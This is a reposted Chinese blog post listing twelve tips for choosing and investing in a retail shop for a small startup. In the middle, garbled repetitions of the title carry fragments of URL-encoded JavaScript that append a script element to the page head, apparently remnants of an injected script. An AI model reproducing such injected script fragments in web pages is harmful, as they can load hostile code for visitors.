注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

想的博客

人生是美好的!有付出就有收获!QQ:790795070

 
 
 

日志

 
 

【引用】投资商铺小本创业必备十二技巧 (值得一看)  

2011-02-09 16:07:15|  分类: 财经--财富 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
2010年07月29日 - 娱乐帮帮 - 一封信两句话三份心

 

作为一名创业者,你在初期可以没有太多的资金,因为有很多的成功人士是“白手起家”的;可以没有太多的经验,也有很多成功人士在此之前没有创业的经历;但是,想要创业成功除了要具备良好的心态之外,还必须懂得一些技巧。
   
  究竟创业初期需要懂得哪些技巧呢?   

1、选择行业要因地制宜
   
  针对位于交通枢纽较远的商铺,应以经营日常用品或价格低、便于携带的消费品为主。针对位于住宅附近的商铺,应以经营日常综合性消费品为主。针对位于办公楼附近的商铺,应以经营文化、办公用品为主,且商品的档次应相对较高。针对位于学校附近的商铺,应以经营文具、饮食、日常用品为主。在投资商铺之前,就应该为它寻找"出路"。
   
   2、对于周边民众购买力需大致了解
   
  商铺周边人群购买力的大小和质量,决定了商铺的基本价值。这对于你的店铺是否能够长期发展有很大的影响。在那些购买力较强的区域,商铺的价值高,你可以适当投入大点,你所获得的回报也将更大。而相反,在购买力较低的区域,你就应该经营一些价廉物美的商品。
   
   3、要了解人流量情况
   
  商铺的收益主要取决于两个方面,一是民众购买力,二是人流量。真正支撑商铺长期盈利的是固定人流,其次是流动人流、客运流(公交、地铁的客流)。
   
   4、把握投资时机有诀窍
   
  从总体上说,在经济形势良好、商业景气、商业利润高于社会平均利润的时期,未必是投资商铺的最佳时机。因为此时投资者选择商铺的空间很小,而且获得商铺要付出的成本很高。反之,在有发展潜力的区域,商业气候尚未形成或正在形成中,投资者可以在较大的范围内选择商铺,需要付出的成本也相对较低。
   
   5、能“傍大款”最好
   
投资商铺小本创业必备十二技巧 (值得一看) - 长空.飞霞 - 夜未央/感恩/生活cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A">投资商铺小本创业必备十二技巧 (值得一看) - 长空.飞霞 - 夜未央/感恩/生活cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A">投资商铺小本创业必备十二技巧 (值得一看) - 长空.飞霞 - 夜未央/感恩/生活cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A">  如果你相中的商铺位于着名连锁店或强势品牌专卖店附近,甚至就在这些店面的隔壁,那么,你大可省去考察商铺市场的时间和精力,因为你的商铺将可以借助这些店面的品牌效应招揽顾客。这样,还可以省下一大笔创业前期必须的广告投资呢。
   
   6、独立门面不可少
   
  独立的门面作为你商铺的广告牌,对于能否打响以后的品牌非常重要。如果有店面没有独立的门面,自然就会失去独立的广告空间,你也就失去了在店前施展营销智慧的空间,这会给店面今后的促销带来很大麻烦。
   
   7、路边店客流量双倍效应
   
  如果你的商铺位于一条道路的一侧,就等于拥有了道路上来回两个方向的客流,这种临街的商铺,商业价值非常高,值得投资。
   
   8、了解商铺的开发商
   
  选择品牌开发商,确保资金安全,是成功投资商铺的一个重要方面。实力雄厚的开发商往往拥有完善的开发流程,以及众多的合作伙伴,这对商铺的商业前景来说就是一种保证。
   
   9、周边交通要便利
   
  理想状态下的商铺或商业街市,应具备接纳八方来客的交通设施,周边拥有轨道交通、公交车站点,当然,停车场也是不可或缺的。
   
   10、建筑结构必须好
   
  建筑物的结构也直接影响到商铺的价值,这一点很多人都没想到。建筑物的结构多种多样,理想的商业建筑结构为框架结构,或者大跨度的无柱类结构(如体育场馆),这些结构的优点是:展示性能好,便于分隔、组合,利于布置和商品摆放。
   
   11、巧用物以类聚
   
  管理部门并没有对某一条街道、某一个市场的经营进行规定,但在长期经营中,某条街道或某一个区域,很可能自发形成销售某类商品的"集中市场"。
   
   12、不忽略发展空间
   
  投资商业物业要具有发展的眼光。有一些看似位置较偏的商铺,前期租金很低,商户难寻,似乎没啥"钱"途。此时,你就要详细分析下该地带的发展前景如何,如果具备好的发展空间的话,尽量将合同签长一点。这也可以省下一大笔的铺租。

 

 

 

    

 

  评论这张
 
阅读(57)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017